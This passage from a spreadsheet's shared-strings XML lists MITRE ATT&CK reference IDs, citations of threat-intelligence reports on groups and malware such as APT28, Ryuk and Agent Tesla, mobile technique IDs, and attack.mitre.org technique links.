  </si>
  <si>
    <t>R0017</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0018</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0019</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0020</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0021</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0022</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0023</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0024</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0025</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0026</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0027</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0028</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0029</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0030</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0031</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0032</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0033</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0034</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0035</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0036</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0037</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0038</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0039</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0040</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0041</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R1002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R1003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R1004</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R1005</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R1006</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R1007</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R1008</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R1009</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R1010</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R1011</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R1012</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R1013</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R1014</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R1015</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R1019</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R1020</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R1021</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R1022</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R1023</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R1024</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R1025</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>S0106</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R1028</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R1029</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R1030</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R1031</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R1032</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R1033</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R1036</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R1037</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DC0173</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R2001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R2002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R2003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R2004</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R2005</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R2006</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R2007</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R2008</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R2009</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R2010</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R2011</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R2012</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Crowdstrike Global Intelligence Team. (2014, June 9). CrowdStrike Intelligence Report: Putter Panda. Retrieved January 22, 2016.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Chen, J. et al. (2019, November). Operation ENDTRADE: TICK’s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Windows Defender Advanced Threat Hunting Team. (2016, April 29). PLATINUM: Targeted attacks in South and Southeast Asia. Retrieved February 15, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Brian Donohue, Katie Nickels, Paul Michaud, Adina Bodkins, Taylor Chapman, Tony Lambert, Jeff Felling, Kyle Rainey, Mike Haag, Matt Graeber, Aaron Didier.. (2020, October 29). A Bazar start: How one hospital thwarted a Ryuk ransomware outbreak. Retrieved October 30, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>McKeague, B. et al. (2019, April 5). Pick-Six: Intercepting a FIN6 Intrusion, an Actor Recently Tied to Ryuk and LockerGoga Ransomware. Retrieved April 17, 2019.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Goody, K., et al (2019, January 11). A Nasty Trick: From Credential Theft Malware to Business Disruption. Retrieved May 12, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>The DFIR Report. (2020, October 8). Ryuk’s Return. Retrieved October 9, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>The DFIR Report. (2020, November 5). Ryuk Speed Run, 2 Hours to Ransom. Retrieved November 6, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Symantec. (2020, November 17). Japan-Linked Organizations Targeted in Long-Running and Sophisticated Attack Campaign. Retrieved December 17, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>MSTIC. (2020, December 18). Analyzing Solorigate, the compromised DLL file that started a sophisticated cyberattack, and how Microsoft Defender helps protect customers . Retrieved January 5, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Matt Apuzzo and Michael S. Schmidt. (2016, November 15). Secret Back Door in Some U.S. Phones Sent Data to China, Analysts Say. Retrieved February 6, 2017.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Jeremy Kirk. (2016, November 16). Why Did Chinese Spyware Linger in U.S. Phones?. Retrieved February 6, 2017.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Kaspersky Lab's Global Research and Analysis Team. (2015, December 4). Sofacy APT hits high profile targets with updated toolset. Retrieved December 10, 2015.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ESET. (2016, October). En Route with Sednit - Part 2: Observing the Comings and Goings. Retrieved November 21, 2016.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Bitdefender. (2015, December). APT28 Under the Scope. Retrieved February 23, 2017.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve"> Kaspersky Lab's Global Research &amp; Analysis Team. (2018, February 20). A Slice of 2017 Sofacy Activity. Retrieved November 27, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>A. Hazum, F. He, I. Marom, B. Melnykov, A. Polkovnichenko. (2019, July 10). Agent Smith: A New Species of Mobile Malware. Retrieved May 7, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Zhang, X. (2018, April 05). Analysis of New Agent Tesla Spyware Variant. Retrieved November 5, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Arsene, L. (2020, April 21). Oil &amp; Gas Spearphishing Campaigns Drop Agent Tesla Spyware in Advance of Historic OPEC+ Deal. Retrieved May 19, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Jazi, H. (2020, April 16). New AgentTesla variant steals WiFi credentials. Retrieved May 19, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>The DigiTrust Group. (2017, January 12). The Rise of Agent Tesla. Retrieved November 5, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Zhang, X. (2017, June 28). In-Depth Analysis of A New Variant of .NET Malware AgentTesla. Retrieved November 5, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Brumaghin, E., et al. (2018, October 15). Old dog, new tricks - Analysing new RTF-based campaign distributing Agent Tesla, Loki with PyREbox. Retrieved November 5, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Walter, J. (2020, August 10). Agent Tesla | Old RAT Uses New Tricks to Stay on Top. Retrieved December 11, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Gostev, A.. (2014, March 12). Agent.btz: a Source of Inspiration?. Retrieved April 8, 2016.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Shevchenko, S.. (2008, November 30). Agent.btz - A Threat That Hit Pentagon. Retrieved April 8, 2016.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Mohit Kumar. (2016, May 11). Kernel Backdoor found in Gadgets Powered by Popular Chinese ARM Maker. Retrieved September 18, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Dahan, A. et al. (2019, December 11). DROPPING ANCHOR: FROM A TRICKBOT INFECTION TO THE DISCOVERY OF THE ANCHOR MALWARE. Retrieved September 10, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Grange, W. (2020, July 13). Anchor_dns malware goes cross platform. Retrieved September 10, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>L. Stefanko. (2019, October 24). Tracking down the developer of Android adware affecting millions of users. Retrieved October 29, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Costin Raiu, Denis Maslennikov, Kurt Baumgartner. (2013, March 26). Android Trojan Found in Targeted Attack. Retrieved December 23, 2016.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>D. Venkatesan. (2020, October 8). Sophisticated new Android malware marks the latest evolution of mobile ransomware . Retrieved October 29, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Karl Dominguez. (2011, October 2). Android Malware Uses Blog Posts as C&amp;C. Retrieved February 6, 2017.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Karl Dominguez. (2011, September 27). ANDROIDOS_ANSERVER.A. Retrieved November 30, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Lookout. (2016, May 25). 5 active mobile threats spoofing enterprise apps. Retrieved December 19, 2016.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>M. Feller. (2020, February 5). Infostealer, Keylogger, and Ransomware in One: Anubis Targets More than 250 Android Applications. Retrieved April 8, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>K. Sun. (2019, January 17). Google Play Apps Drop Anubis, Use Motion-based Evasion. Retrieved January 20, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>zLabs. (2019, November 12). How Zimperium’s z9 Detected Unknown Mobile Malware Overlooked by the AV Industry . Retrieved January 20, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Cybersecurity and Infrastructure Security Agency. (2021, February 21). AppleJeus: Analysis of North Korea’s Cryptocurrency Malware. Retrieved March 1, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>FireEye Threat Intelligence. (2015, December 1). China-based Cyber Threat Group Uses Dropbox for Malware Communications and Targets Hong Kong Media Outlets. Retrieved December 4, 2015.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Villeneuve, N. et al.. (2013). OPERATION SAFFRON ROSE . Retrieved May 28, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Check Point Software Technologies. (2015). ROCKET KITTEN: A CAMPAIGN WITH 9 LIVES. Retrieved March 16, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Cedric Pernet, Kenney Lu. (2015, March 19). Operation Woolen-Goldfish - When Kittens Go phishing. Retrieved April 21, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Iran Threats . (2017, December 5). Flying Kitten to Rocket Kitten, A Case of Ambiguity and Shared Code. Retrieved May 28, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Dahl, M.. (2014, May 13). Cat Scratch Fever: CrowdStrike Tracks Newly Reported Iranian Actor as FLYING KITTEN. Retrieved May 27, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>FSI. (2017, July 27). Campaign Rifle - Andariel, the Maiden of Anguish. Retrieved September 29, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>IssueMakersLab. (2017, May 1). Operation GoldenAxe. Retrieved September 29, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>AhnLab. (2018, June 23). Targeted attacks by Andariel Threat Group, a subgroup of the Lazarus. Retrieved September 29, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Chen, Joseph. (2018, July 16). New Andariel Reconnaissance Tactics Uncovered. Retrieved September 29, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>CrowdStrike. (2021, September 29). Silent Chollima Adversary Profile. Retrieved September 29, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>US Treasury . (2019, September 13). Treasury Sanctions North Korean State-Sponsored Malicious Cyber Groups. Retrieved September 29, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Jazi, H. (2021, April 19). Lazarus APT conceals malicious code within BMP image to drop its RAT . Retrieved September 29, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Park, S. (2021, June 15). Andariel evolves to target South Korea with ransomware. Retrieved September 29, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>QiAnXin Threat Intelligence Center. (2019, February 18). APT-C-36: Continuous Attacks Targeting Colombian Government Institutions and Corporations. Retrieved May 5, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Mandiant. (n.d.). APT1 Exposing One of China’s Cyber Espionage Units. Retrieved July 18, 2016.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Mandiant. (n.d.). Appendix C (Digital) - The Malware Arsenal. Retrieved July 18, 2016.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>FireEye Labs. (2014, May 20). The PLA and the 8:00am-5:00pm Work Day: FireEye Confirms DOJ’s Findings on APT1 Intrusion Activity. Retrieved November 4, 2014.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Sherstobitoff, R., Malhotra, A. (2018, October 18). ‘Operation Oceansalt’ Attacks South Korea, U.S., and Canada With Source Code From Chinese Hacker Group. Retrieved November 30, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Meyers, A. (2013, March 29). Whois Numbered Panda. Retrieved January 14, 2016.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Moran, N., Oppenheim, M., Engle, S., &amp; Wartell, R.. (2014, September 3). Darwin’s Favorite APT Group [Blog]. Retrieved November 12, 2014.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Sancho, D., et al. (2012, May 22). IXESHE An APT Campaign. Retrieved June 7, 2019.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Moran, N., &amp; Villeneuve, N. (2013, August 12). Survival of the Fittest: New York Times Attackers Evolve Quickly [Blog]. Retrieved November 12, 2014.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>FireEye Labs/FireEye Threat Intelligence. (2015, May 14). Hiding in Plain Sight: FireEye and Microsoft Expose Obfuscation Tactic. Retrieved January 22, 2016.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Carvey, H.. (2014, September 2). Where you AT?: Indicators of lateral movement using at.exe on Windows 7 systems. Retrieved January 25, 2016.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Shelmire, A.. (2015, July 6). Evasive Maneuvers. Retrieved January 22, 2016.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Shelmire, A. (2015, July 06). Evasive Maneuvers by the Wekby group with custom ROP-packing and DNS covert channels. Retrieved November 15, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Grunzweig, J., et al. (2016, May 24). New Wekby Attacks Use DNS Requests As Command and Control Mechanism. Retrieved November 15, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Adair, S. (2017, February 17). Detecting and Responding to Advanced Threats within Exchange Environments. Retrieved March 20, 2017.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Grunzweig, J., et al. (2016, May 24). New Wekby Attacks Use DNS Requests As Command and Control Mechanism. Retrieved August 17, 2016.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NSA/FBI. (2020, August). Russian GRU 85th GTsSS Deploys Previously Undisclosed Drovorub Malware. Retrieved August 25, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NSA, CISA, FBI, NCSC. (2021, July). Russian GRU Conducting Global Brute Force Campaign to Compromise Enterprise and Cloud Environments. Retrieved July 26, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Mueller, R. (2018, July 13). Indictment - United States of America vs. VIKTOR BORISOVICH NETYKSHO, et al. Retrieved September 13, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>F-Secure Labs. (2015, September 17). The Dukes: 7 years of Russian cyberespionage. Retrieved December 10, 2015.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Foulds, I. et al. (2018, August 7). AD DS Getting Started. Retrieved September 23, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Confluence Support. (2021, April 22). Working with Confluence Logs. Retrieved September 23, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Amazon. (n.d.). Start Building on AWS Today. Retrieved October 13, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Microsoft. (n.d.). Azure products. Retrieved October 13, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Microsoft. (n.d.). Azure Blob Storage. Retrieved October 13, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Google. (n.d.). Cloud Storage. Retrieved October 13, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>kubernetes. (2021, January 16). Cluster Administration. Retrieved October 13, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>kubernetes. (n.d.). cluster-info. Retrieved October 13, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Confluence Support. (2021, September 8). How to enable command line audit logging in linux. Retrieved September 23, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Gagliardi, R. (n.d.). Audit in a OS X System. Retrieved September 23, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>docker docs. (n.d.). Containers. Retrieved October 13, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1435</t>
  </si>
  <si>
    <t>T1433</t>
  </si>
  <si>
    <t>T1432</t>
  </si>
  <si>
    <t>T1517</t>
  </si>
  <si>
    <t>T1413</t>
  </si>
  <si>
    <t>T1409</t>
  </si>
  <si>
    <t>T1438</t>
  </si>
  <si>
    <t>T1418</t>
  </si>
  <si>
    <t>T1427</t>
  </si>
  <si>
    <t>T1402</t>
  </si>
  <si>
    <t>T1616</t>
  </si>
  <si>
    <t>T1429</t>
  </si>
  <si>
    <t>T1512</t>
  </si>
  <si>
    <t>T1414</t>
  </si>
  <si>
    <t>T1412</t>
  </si>
  <si>
    <t>T1448</t>
  </si>
  <si>
    <t>T1510</t>
  </si>
  <si>
    <t>T1540</t>
  </si>
  <si>
    <t>T1605</t>
  </si>
  <si>
    <t>T1436</t>
  </si>
  <si>
    <t>T1577</t>
  </si>
  <si>
    <t>T1532</t>
  </si>
  <si>
    <t>T1471</t>
  </si>
  <si>
    <t>T1533</t>
  </si>
  <si>
    <t>T1447</t>
  </si>
  <si>
    <t>T1475</t>
  </si>
  <si>
    <t>T1476</t>
  </si>
  <si>
    <t>T1401</t>
  </si>
  <si>
    <t>T1446</t>
  </si>
  <si>
    <t>T1408</t>
  </si>
  <si>
    <t>T1520</t>
  </si>
  <si>
    <t>T1466</t>
  </si>
  <si>
    <t>T1407</t>
  </si>
  <si>
    <t>T1456</t>
  </si>
  <si>
    <t>T1439</t>
  </si>
  <si>
    <t>T1523</t>
  </si>
  <si>
    <t>T1428</t>
  </si>
  <si>
    <t>T1404</t>
  </si>
  <si>
    <t>T1449</t>
  </si>
  <si>
    <t>T1450</t>
  </si>
  <si>
    <t>T1405</t>
  </si>
  <si>
    <t>T1458</t>
  </si>
  <si>
    <t>T1477</t>
  </si>
  <si>
    <t>T1420</t>
  </si>
  <si>
    <t>T1541</t>
  </si>
  <si>
    <t>T1472</t>
  </si>
  <si>
    <t>T1581</t>
  </si>
  <si>
    <t>Geofencing</t>
  </si>
  <si>
    <t>T1617</t>
  </si>
  <si>
    <t>Hooking</t>
  </si>
  <si>
    <t>T1417</t>
  </si>
  <si>
    <t>T1516</t>
  </si>
  <si>
    <t>T1411</t>
  </si>
  <si>
    <t>T1478</t>
  </si>
  <si>
    <t>T1464</t>
  </si>
  <si>
    <t>T1579</t>
  </si>
  <si>
    <t>T1430</t>
  </si>
  <si>
    <t>T1461</t>
  </si>
  <si>
    <t>T1452</t>
  </si>
  <si>
    <t>T1463</t>
  </si>
  <si>
    <t>T1444</t>
  </si>
  <si>
    <t>T1403</t>
  </si>
  <si>
    <t>T1398</t>
  </si>
  <si>
    <t>T1400</t>
  </si>
  <si>
    <t>T1399</t>
  </si>
  <si>
    <t>T1575</t>
  </si>
  <si>
    <t>T1507</t>
  </si>
  <si>
    <t>T1423</t>
  </si>
  <si>
    <t>T1410</t>
  </si>
  <si>
    <t>T1406</t>
  </si>
  <si>
    <t>T1470</t>
  </si>
  <si>
    <t>T1424</t>
  </si>
  <si>
    <t>T1604</t>
  </si>
  <si>
    <t>T1544</t>
  </si>
  <si>
    <t>T1468</t>
  </si>
  <si>
    <t>T1469</t>
  </si>
  <si>
    <t>T1467</t>
  </si>
  <si>
    <t>T1465</t>
  </si>
  <si>
    <t>T1603</t>
  </si>
  <si>
    <t>T1513</t>
  </si>
  <si>
    <t>T1451</t>
  </si>
  <si>
    <t>T1582</t>
  </si>
  <si>
    <t>T1437</t>
  </si>
  <si>
    <t>T1521</t>
  </si>
  <si>
    <t>T1474</t>
  </si>
  <si>
    <t>T1508</t>
  </si>
  <si>
    <t>T1426</t>
  </si>
  <si>
    <t>T1422</t>
  </si>
  <si>
    <t>T1421</t>
  </si>
  <si>
    <t>T1509</t>
  </si>
  <si>
    <t>T1576</t>
  </si>
  <si>
    <t>T1416</t>
  </si>
  <si>
    <t>T1618</t>
  </si>
  <si>
    <t>T1481</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1595</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1595/001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1595/002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1557</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T157/002</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1557/001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1071</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1071/001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1071/002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1071/003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1071/004</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1010</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1560</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1560/001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1560/002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1560/003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1123</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1119</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1020</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1020/001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1197</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1547</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1547/001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1547/002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1547/003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1547/004</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
